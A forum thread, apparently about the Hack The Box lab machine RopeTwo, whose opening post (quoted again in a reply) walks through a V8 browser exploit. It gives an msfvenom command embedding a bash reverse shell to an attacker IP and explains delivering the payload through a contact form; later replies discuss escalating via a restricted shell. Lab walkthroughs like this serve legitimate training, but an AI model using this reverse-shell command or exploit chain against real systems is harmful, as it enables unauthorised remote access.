TUTORIAL RopeTwo
by terobau - October 27, 2020 at 04:48 PM
#1
Here comes the exploit for rope2; this will only give you the shell on the box. User part coming soon.

First create two files: index.html and pwn.js.

Copy the contents from the following links and make sure to change the IP in index.html.

For index.html:

https://ghostbin.co/paste/3arp6c2

For pwn.js:

https://ghostbin.co/paste/7sprd

Generate the shellcode:

msfvenom -p linux/x64/exec -f num CMD='bash -c "bash -i >& /dev/tcp/10.10.xx.xx/9001 0>&1"'

Replace the shellcode in pwn.js [line: 94] with your generated shellcode.

Now start a Python HTTP server on port 8080 (if you want to change the port, make sure to change it in index.html too) and a netcat listener on your selected port (use the same port that you used while generating the shellcode).

Head over to http://10.10.10.196:8000/contact

Type anything in name and subject, but paste the contents of index.html in the message box, then click on send.
If everything works fine you should get a shell as chromeuser.

For those who want to know what's going on:
https://faraz.faith/2019-12-13-starctf-oob-v8-indepth/

The v8 used in the rope2 box is compiled with exactly the same patch as shown in the blog, but since pointer compression was added later, the exploit shown in the blog no longer works; tweaking the exploit a little bit should work.

Have a sweet reverse shell
#2
Thank you!!! Please, someone bring a Nobel Prize for this guy.
#3
Thank you, but there is no user.txt and it's permission denied to access r4j.
#4
Really, you got the shell with these scripts? lolz
#5
(October 30, 2020 at 02:24 AM)lamehacker Wrote: Really, you got the shell with these scripts? lolz

Why? Do you have any problem?
#6
(October 30, 2020 at 03:21 AM)terobau Wrote:
(October 30, 2020 at 02:24 AM)lamehacker Wrote: Really, you got the shell with these scripts? lolz

Why? Do you have any problem?

The server doesn't get my page. I don't know why.
#7
Bro, thanks a lot, it works perfectly. I have a shell as user chromeuser, now I'm trying to get the user flag.

(October 27, 2020 at 04:48 PM)terobau Wrote: Here comes the exploit for rope2; this will only give you the shell on the box. User part coming soon.

First create two files: index.html and pwn.js.

Copy the contents from the following links and make sure to change the IP in index.html.

For index.html:

https://ghostbin.co/paste/3arp6c2

For pwn.js:

https://ghostbin.co/paste/7sprd

Generate the shellcode:

msfvenom -p linux/x64/exec -f num CMD='bash -c "bash -i >& /dev/tcp/10.10.xx.xx/9001 0>&1"'

Replace the shellcode in pwn.js [line: 94] with your generated shellcode.

Now start a Python HTTP server on port 8080 (if you want to change the port, make sure to change it in index.html too) and a netcat listener on your selected port (use the same port that you used while generating the shellcode).

Head over to http://10.10.10.196:8000/contact

Type anything in name and subject, but paste the contents of index.html in the message box, then click on send.
If everything works fine you should get a shell as chromeuser.

For those who want to know what's going on:
https://faraz.faith/2019-12-13-starctf-oob-v8-indepth/

The v8 used in the rope2 box is compiled with exactly the same patch as shown in the blog, but since pointer compression was added later, the exploit shown in the blog no longer works; tweaking the exploit a little bit should work.

Have a sweet reverse shell

Bro, thanks a lot, I have given rep+2.
#8
Anyone moved on to user yet?
#9
Use /usr/bin/rshell to escalate to r4j.
#10
(November 02, 2020 at 03:53 PM)dory23 Wrote: Use /usr/bin/rshell to escalate to r4j.

But how can I escalate from this binary?
#11
(November 02, 2020 at 03:53 PM)dory23 Wrote: Use /usr/bin/rshell to escalate to r4j.

Nice, a restricted shell. But how to escape?
#12
(November 02, 2020 at 04:55 PM)mandoline Wrote:
(November 02, 2020 at 03:53 PM)dory23 Wrote: Use /usr/bin/rshell to escalate to r4j.

Nice, a restricted shell. But how to escape?

Use Google; there is a website that has enough documentation about this shell and how it works.
